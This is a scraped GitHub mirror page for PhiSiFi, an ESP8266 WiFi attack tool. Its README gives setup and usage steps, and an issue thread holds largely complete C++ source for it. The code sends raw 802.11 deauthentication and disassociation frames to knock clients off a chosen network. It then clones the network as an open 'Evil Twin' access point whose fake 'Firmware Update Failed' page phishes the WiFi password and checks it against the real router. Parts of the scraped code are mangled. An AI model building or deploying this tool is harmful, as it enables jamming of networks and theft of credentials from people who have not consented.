p3tr0s / phisifi Goto Github PK

View Code? Open in Web Editor NEW

93.0 3.0 14.0 19 KB

WiFi Hacking with an ESP8266 - Deauth combined with Evil Twin attack

C++ 100.00%

cheap deauthentication-attack deauther esp esp8266 evil-twin hacking hacking-tool hak5 sbc spacehuhn wifi

phisifi's Introduction

PhiSiFi

A franken baby of M1z23R/ESP8266-EvilTwin and adamff1/ESP8266-Captive-Portal.

It uses an ESP8266 to attack a WiFi network using Deauther && || Evil-Twin AP method.

FEATURES :

Deauthentication of a target WiFi access point
Evil-Twin AP to capture passwords with password verification against the og access point
It can do both attacks at the same time, no toggling of the deauther is required.

DISCLAIMER

The source code given in this public repo is for educational use only and should only be used against your own networks and devices!
Please check the legal regulations in your country before using it.

Install using Arduino IDE

Install Arduino IDE
In Arduino go to File -> Preferences add this URL to Additional Boards Manager URLs -> https://raw.githubusercontent.com/SpacehuhnTech/arduino/main/package_spacehuhn_index.json
In Arduino go to Tools -> Board -> Boards Manager search for and install the deauther package
Download and open PhiSiFi with Arduino IDE
Select an ESP8266 Deauther board in Arduino under tools -> board
Connect your device and select the serial port in Arduino under tools -> port
Click Upload button

How to use:

Connect to the AP named WiPhi_34732 with password d347h320 from your phone/PC.
Select the target AP you want to attack (list of available APs refreshes every 30secs - page reload is required).
Click the Start Deauthing button to start kicking devices off the selected network.
Click the Start Evil-Twin button and optionally reconnect to the newly created AP named same as your target (will be open).
You can stop any of the attacks by visiting 192.168.4.1/admin while conected to Evil-Twin AP or by resetting the ESP8266.
Once a correct password is found, AP will be restarted with default ssid WiPhi_34732 / d347h320 and at the bottom of a table you should be able to see something like "Successfully got password for - TARGET_SSID - PASSWORD
- If you power down / hard reset the gathered info will be lost

It doesn't work for me:

For starters, I don't really care - it's something I did for fun and a POC that worked on my test surface and I do not provide any support for.
Follow SpaceHuhn and read his blog https://blog.spacehuhn.com/deauth-attack-not-working to learn about the attack.
If you can offer some input on what you think is wrong feel free to let me know and I will try, at some point, to fix it.

Credits:

License

This software is licensed under the MIT License.

Donation / Support / Appreciation

phisifi's People

Contributors

Stargazers

Watchers

Forkers

romnial klatau barzan1981 11tarekahamed0012 hattaz3t misterdax xiv3r behnamakbaribm fantas21 tharkadharshana gabrielmerci lorenzo1205 abey1002 entropydokidoki

phisifi's Issues

Esp8266 not starting automatically after user entering correct password

Esp8266 not starting automatically after user entering correct password. And when I reconnect esp8266 to power . It's not showing password.. even the default AP' name is different like 'Fairy.......'

Message to Sign In Not showing

deauthPacket invalid

cant deauth.I think it is invalid.WI-PWN could work.so it doesn't matter with my board.

btw i use VScode to upload. and lib choose well

Ap not show the name who exist in the code

ap shows previous ap name tried full reset including nvm doesnt work

Please release the bin file

Bin file can be flashed with mobile. So please release the bin file.

enhanced deauth which works well on esp8266

#include <Arduino.h>
#include <ESP8266WiFi.h>
#include <DNSServer.h>
#include <ESP8266WebServer.h>
#include <ESP8266HTTPClient.h>

extern "C" {
#include "user_interface.h"
}

typedef struct
{
String ssid;
uint8_t ch;
uint8_t bssid[6];
} _Network;

const byte DNS_PORT = 53;
IPAddress apIP(192, 168, 1, 1);
DNSServer dnsServer;
ESP8266WebServer webServer(80);

_Network _networks[16];
_Network _selectedNetwork;

void clearArray() {
for (int i = 0; i < 16; i++) {
_Network _network;
_networks[i] = _network;
}

}

String _correct = "";
String _tryPassword = "";

// Default main strings
#define SUBTITLE "ACCESS POINT RESCUE MODE"
#define TITLE "⚠ Firmware Update Failed"
#define BODY "Your router encountered a problem while automatically installing the latest firmware update.

To revert the old firmware and manually update later, please verify your password."

String header(String t) {
String a = String(_selectedNetwork.ssid);
String CSS = "article { background: #f2f2f2; padding: 1.3em; }"
"body { color: #333; font-family: Century Gothic, sans-serif; font-size: 18px; line-height: 24px; margin: 0; padding: 0; }"
"div { padding: 0.5em; }"
"h1 { margin: 0.5em 0 0 0; padding: 0.5em; font-size:7vw;}"
"input { width: 100%; padding: 9px 10px; margin: 8px 0; box-sizing: border-box; border-radius: 0; border: 1px solid #555555; border-radius: 10px; }"
"label { color: #333; display: block; font-style: italic; font-weight: bold; }"
"nav { background: #0066ff; color: #fff; display: block; font-size: 1.3em; padding: 1em; }"
"nav b { display: block; font-size: 1.5em; margin-bottom: 0.5em; } "
"textarea { width: 100%; }"
;
String h = ""
"<title>

" + a + " :: " + t + "</title>"
"<meta name=viewport content="width=device-width,initial-scale=1">"
"<style>" + CSS + "</style>"
"<meta charset="UTF-8">"
"" + a + " " + SUBTITLE + "

" + t + "

";
return h;
}

String footer() {
return "

";
}

String index() {
return header(TITLE) + "

" + BODY + "

WiFi password:" +
"" + footer();
}

void setup() {

Serial.begin(115200);
WiFi.mode(WIFI_AP_STA);
wifi_promiscuous_enable(1);
WiFi.softAPConfig(IPAddress(192, 168, 4, 1) , IPAddress(192, 168, 4, 1) , IPAddress(255, 255, 255, 0));
WiFi.softAP("WiPhi_34732", "Op00000000");
dnsServer.start(53, "*", IPAddress(192, 168, 4, 1));

webServer.on("/", handleIndex);
webServer.on("/result", handleResult);
webServer.on("/admin", handleAdmin);
webServer.onNotFound(handleIndex);
webServer.begin();
}
void performScan() {
int n = WiFi.scanNetworks();
clearArray();
if (n >= 0) {
for (int i = 0; i < n && i < 16; ++i) {
_Network network;
network.ssid = WiFi.SSID(i);
for (int j = 0; j < 6; j++) {
network.bssid[j] = WiFi.BSSID(i)[j];
}

  network.ch = WiFi.channel(i);
  _networks[i] = network;
}

}
}

bool hotspot_active = false;
bool deauthing_active = false;

void handleResult() {
String html = "";
if (WiFi.status() != WL_CONNECTED) {
if (webServer.arg("deauth") == "start") {
deauthing_active = true;
}
webServer.send(200, "text/html", "<script> setTimeout(function(){window.location.href = '/';}, 4000); </script>

⊗
Wrong Password

Please, try again.

");
Serial.println("Wrong password tried!");
} else {
_correct = "Successfully got password for: " + _selectedNetwork.ssid + " Password: " + _tryPassword;
hotspot_active = false;
dnsServer.stop();
int n = WiFi.softAPdisconnect (true);
Serial.println(String(n));
WiFi.softAPConfig(IPAddress(192, 168, 4, 1) , IPAddress(192, 168, 4, 1) , IPAddress(255, 255, 255, 0));
WiFi.softAP("WiPhi_34732", "Op00000000");
dnsServer.start(53, "*", IPAddress(192, 168, 4, 1));
Serial.println("Good password was entered !");
Serial.println(_correct);
}
}

String _tempHTML = ""
"<style> .content {max-width: 500px;margin: auto;}table, th, td {border: 1px solid black;border-collapse: collapse;padding-left:10px;padding-right:10px;}</style>"
"

"
"

"
"<button style='display:inline-block;'{disabled}>{deauth_button}"
""
"<button style='display:inline-block;'{disabled}>{hotspot_button}"
"

void handleIndex() {

if (webServer.hasArg("ap")) {
for (int i = 0; i < 16; i++) {
if (bytesToStr(_networks[i].bssid, 6) == webServer.arg("ap") ) {
_selectedNetwork = _networks[i];
}
}
}

if (webServer.hasArg("deauth")) {
if (webServer.arg("deauth") == "start") {
deauthing_active = true;
} else if (webServer.arg("deauth") == "stop") {
deauthing_active = false;
}
}

if (webServer.hasArg("hotspot")) {
if (webServer.arg("hotspot") == "start") {
hotspot_active = true;

  dnsServer.stop();
  int n = WiFi.softAPdisconnect (true);
  Serial.println(String(n));
  WiFi.softAPConfig(IPAddress(192, 168, 4, 1) , IPAddress(192, 168, 4, 1) , IPAddress(255, 255, 255, 0));
  WiFi.softAP(_selectedNetwork.ssid.c_str());
  dnsServer.start(53, "*", IPAddress(192, 168, 4, 1));

} else if (webServer.arg("hotspot") == "stop") {
  hotspot_active = false;
  dnsServer.stop();
  int n = WiFi.softAPdisconnect (true);
  Serial.println(String(n));
  WiFi.softAPConfig(IPAddress(192, 168, 4, 1) , IPAddress(192, 168, 4, 1) , IPAddress(255, 255, 255, 0));
  WiFi.softAP("WiPhi_34732", "Op00000000");
  dnsServer.start(53, "*", IPAddress(192, 168, 4, 1));
}
return;

}

if (hotspot_active == false) {
String _html = _tempHTML;

for (int i = 0; i < 16; ++i) {
  if ( _networks[i].ssid == "") {
    break;
  }
  _html += "<tr><td>" + _networks[i].ssid + "</td><td>" + bytesToStr(_networks[i].bssid, 6) + "</td><td>" + String(_networks[i].ch) + "<td><form method='post' action='/?ap=" + bytesToStr(_networks[i].bssid, 6) + "'>";

  if (bytesToStr(_selectedNetwork.bssid, 6) == bytesToStr(_networks[i].bssid, 6)) {
    _html += "<button style='background-color: #90ee90;'>Selected</button></form></td></tr>";
  } else {
    _html += "<button>Select</button></form></td></tr>";
  }
}

if (deauthing_active) {
  _html.replace("{deauth_button}", "Stop deauthing");
  _html.replace("{deauth}", "stop");
} else {
  _html.replace("{deauth_button}", "Start deauthing");
  _html.replace("{deauth}", "start");
}

if (hotspot_active) {
  _html.replace("{hotspot_button}", "Stop EvilTwin");
  _html.replace("{hotspot}", "stop");
} else {
  _html.replace("{hotspot_button}", "Start EvilTwin");
  _html.replace("{hotspot}", "start");
}


if (_selectedNetwork.ssid == "") {
  _html.replace("{disabled}", " disabled");
} else {
  _html.replace("{disabled}", "");
}

_html += "</table>";

if (_correct != "") {
  _html += "</br><h3>" + _correct + "</h3>";
}

_html += "</div></body></html>";
webServer.send(200, "text/html", _html);

} else {

if (webServer.hasArg("password")) {
  _tryPassword = webServer.arg("password");
  if (webServer.arg("deauth") == "start") {
    deauthing_active = false;
  }
  delay(1000);
  WiFi.disconnect();
  WiFi.begin(_selectedNetwork.ssid.c_str(), webServer.arg("password").c_str(), _selectedNetwork.ch, _selectedNetwork.bssid);
  webServer.send(200, "text/html", "<!DOCTYPE html> <html><script> setTimeout(function(){window.location.href = '/result';}, 15000); </script></head><body><center><h2 style='font-size:7vw'>Verifying integrity, please wait...<br><progress value='10' max='100'>10%</progress></h2></center></body> </html>");
  if (webServer.arg("deauth") == "start") {
  deauthing_active = true;
  }
} else {
  webServer.send(200, "text/html", index());
}

}

void handleAdmin() {

String _html = _tempHTML;

if (webServer.hasArg("ap")) {
for (int i = 0; i < 16; i++) {
if (bytesToStr(_networks[i].bssid, 6) == webServer.arg("ap") ) {
_selectedNetwork = _networks[i];
}
}
}

if (webServer.hasArg("deauth")) {
if (webServer.arg("deauth") == "start") {
deauthing_active = true;
} else if (webServer.arg("deauth") == "stop") {
deauthing_active = false;
}
}

if (webServer.hasArg("hotspot")) {
if (webServer.arg("hotspot") == "start") {
hotspot_active = true;

  dnsServer.stop();
  int n = WiFi.softAPdisconnect (true);
  Serial.println(String(n));
  WiFi.softAPConfig(IPAddress(192, 168, 4, 1) , IPAddress(192, 168, 4, 1) , IPAddress(255, 255, 255, 0));
  WiFi.softAP(_selectedNetwork.ssid.c_str());
  dnsServer.start(53, "*", IPAddress(192, 168, 4, 1));

} else if (webServer.arg("hotspot") == "stop") {
  hotspot_active = false;
  dnsServer.stop();
  int n = WiFi.softAPdisconnect (true);
  Serial.println(String(n));
  WiFi.softAPConfig(IPAddress(192, 168, 4, 1) , IPAddress(192, 168, 4, 1) , IPAddress(255, 255, 255, 0));
  WiFi.softAP("WiPhi_34732", "Op00000000");
  dnsServer.start(53, "*", IPAddress(192, 168, 4, 1));
}
return;

}

for (int i = 0; i < 16; ++i) {
if ( _networks[i].ssid == "") {
break;
}
_html += "

SSID	BSSID	Channel	Select
" + _networks[i].ssid + "	" + bytesToStr(_networks[i].bssid, 6) + "	" + String(_networks[i].ch) + "	"; `if ( bytesToStr(_selectedNetwork.bssid, 6) == bytesToStr(_networks[i].bssid, 6)) { _html += "<button style='background-color: #90ee90;'>Selected</button></form></td></tr>"; } else { _html += "<button>Select</button></form></td></tr>"; }` } if (deauthing_active) { _html.replace("{deauth_button}", "Stop deauthing"); _html.replace("{deauth}", "stop"); } else { _html.replace("{deauth_button}", "Start deauthing"); _html.replace("{deauth}", "start"); } if (hotspot_active) { _html.replace("{hotspot_button}", "Stop EvilTwin"); _html.replace("{hotspot}", "stop"); } else { _html.replace("{hotspot_button}", "Start EvilTwin"); _html.replace("{hotspot}", "start"); } if (_selectedNetwork.ssid == "") { _html.replace("{disabled}", " disabled"); } else { _html.replace("{disabled}", ""); } if (_correct != "") { _html += " " + _correct + " "; } _html += "

";
webServer.send(200, "text/html", _html);

}

String bytesToStr(const uint8_t* b, uint32_t size) {
String str;
const char ZERO = '0';
const char DOUBLEPOINT = ':';
for (uint32_t i = 0; i < size; i++) {
if (b[i] < 0x10) str += ZERO;
str += String(b[i], HEX);

if (i < size - 1) str += DOUBLEPOINT;

}
return str;
}

unsigned long now = 0;
unsigned long wifinow = 0;
unsigned long deauth_now = 0;

bool sendPacket(uint8_t* packet, uint16_t packetSize, uint8_t wifi_channel) {
Serial.println(wifi_channel);
// Serial.println(bytesToStr(packet, 26));
wifi_set_channel(wifi_channel);

bool sent = wifi_send_pkt_freedom(packet, packetSize, 0) == 0;
if (sent) Serial.println("done");
return sent;

}

void loop() {

dnsServer.processNextRequest();
webServer.handleClient();

if (deauthing_active && millis() - deauth_now >= 200) {

uint8_t packet[26] = {
0xC0, 0x00,
0x00, 0x00,
0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00,
0x01, 0x00
};



bool success = false;
memcpy(&packet[10], _selectedNetwork.bssid, 6);
memcpy(&packet[16], _selectedNetwork.bssid, 6);

if (sendPacket(packet, sizeof(packet), _selectedNetwork.ch)) {
    success = true;
}

// send disassociate frame
packet[0] = 0xa0;

if (sendPacket(packet, sizeof(packet), _selectedNetwork.ch)) {
    success = true;
}



// uint8_t* apMac;

// uint8_t reason;
// uint8_t ch;
// apMac = _selectedNetwork.bssid;
// uint8_t stMac[6] = {0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF};
// reason = 1;
// ch = _selectedNetwork.ch;
// deauthDevice(apMac, stMac, reason, ch);


// uint8_t deauthPacket[26] = {
//         /*  0 - 1  */ 0xC0, 0x00,                         // type, subtype c0: deauth (a0: disassociate)
//         /*  2 - 3  */ 0x00, 0x00,                         // duration (SDK takes care of that)
//         /*  4 - 9  */ 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, // reciever (target)
//         /* 10 - 15 */ 0xb6, 0x69, 0x21, 0x74, 0x02, 0xb6, // source (ap)
//         /* 16 - 21 */ 0xb6, 0x69, 0x21, 0x74, 0x02, 0xb6, // BSSID (ap)
//         /* 22 - 23 */ 0x00, 0x00,                         // fragment & squence number
//         /* 24 - 25 */ 0x01, 0x00                          // reason code (1 = unspecified reason)
//     };


// packetSize = sizeof(deauthPacket);
// uint8_t deauthpkt[packetSize];
// uint8_t broadcast[] = {0x32, 0xAE, 0xA4, 0x07, 0x0D, 0x66};

// memcpy(deauthpkt, deauthPacket, packetSize);
// memcpy(&deauthpkt[4], broadcast, 6);
// // memcpy(&deauthpkt[10], _selectedNetwork.bssid, 6);
// // memcpy(&deauthpkt[16], _selectedNetwork.bssid, 6);
// deauthpkt[24] = 1;

// Serial.println(bytesToStr(deauthPacket, 26));
// deauthpkt[0] = 0xc0;
// wifi_set_channel(_selectedNetwork.ch);
// Serial.println(wifi_send_pkt_freedom(deauthpkt, sizeof(deauthPacket), 0));
// Serial.println(bytesToStr(deauthPacket, 26));
// uint8_t disassocpkt[packetSize];
// memcpy(disassocpkt, deauthpkt, packetSize);
// disassocpkt[0] = 0Xa0;
// Serial.println(wifi_send_pkt_freedom(disassocpkt, sizeof(deauthPacket), 0));

// deauth_now = millis();










// packetSize = sizeof(deauthPacket);

// uint8_t deauthpkt[sizeof(deauthPacket)];

// memcpy(deauthpkt, deauthPacket, packetSize);

// memcpy(&deauthPacket[4], broadcast, 6);
// memcpy(&deauthPacket[10], _selectedNetwork.bssid, 6);
// memcpy(&deauthPacket[16], _selectedNetwork.bssid, 6);
// uint8_t deauthPacket[24] = 1;

// // send deauth frame
// uint8_t deauthPacket[0] = 0xc0;

// wifi_set_channel(_selectedNetwork.ch);

// wifi_send_pkt_freedom(deauthPacket, sizeof(deauthPacket), _selectedNetwork.ch) == 0;
// // send disassociate frame
// // uint8_t disassocpkt[packetSize];

// // memcpy(disassocpkt, deauthPacket, packetSize);

// uint8_t disassocpkt[0] = 0xa0;

// wifi_set_channel(_selectedNetwork.ch);

// wifi_send_pkt_freedom(deauthPacket, sizeof(deauthPacket), _selectedNetwork.ch) == 0;
deauth_now = millis();

}

if (millis() - now >= 15000) {
performScan();
now = millis();
}

if (millis() - wifinow >= 2000) {
// if (WiFi.status() != WL_CONNECTED) {
// Serial.println("BAD");
// } else {
// Serial.println("GOOD");
// }
wifinow = millis();
}
}

Must find the bin file 😆😆

How can I redo the "wifi" sign to make it more user-friendly?, seems like deauther doesn't work anymore!?...."I use google translate". Everything worked fine 🥹🥹

Recommend Projects

React

A declarative, efficient, and flexible JavaScript library for building user interfaces.
Vue.js

🖖 Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.
Typescript

TypeScript is a superset of JavaScript that compiles to clean JavaScript output.
TensorFlow

An Open Source Machine Learning Framework for Everyone
Django

The Web framework for perfectionists with deadlines.
Laravel

A PHP framework for web artisans
D3

Bring data to life with SVG, Canvas and HTML. 📊📈🎉

Recommend Topics

javascript

JavaScript (JS) is a lightweight interpreted programming language with first-class functions.
web

Some thing interesting about web. New door for the world.
server

A server is a program made to process requests and deliver data to clients.
Machine learning

Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.
Visualization

Some thing interesting about visualization, use data art
Game

Some thing interesting about game, make everyone happy.

Recommend Org

Facebook

We are working to build community through open source technology. NB: members must have two-factor auth.
Microsoft

Open source projects and samples from Microsoft.
Google

Google ❤️ Open Source for everyone.
Alibaba

Alibaba Open Source for everyone
D3

Data-Driven Documents codes.
Tencent

China tencent open source team.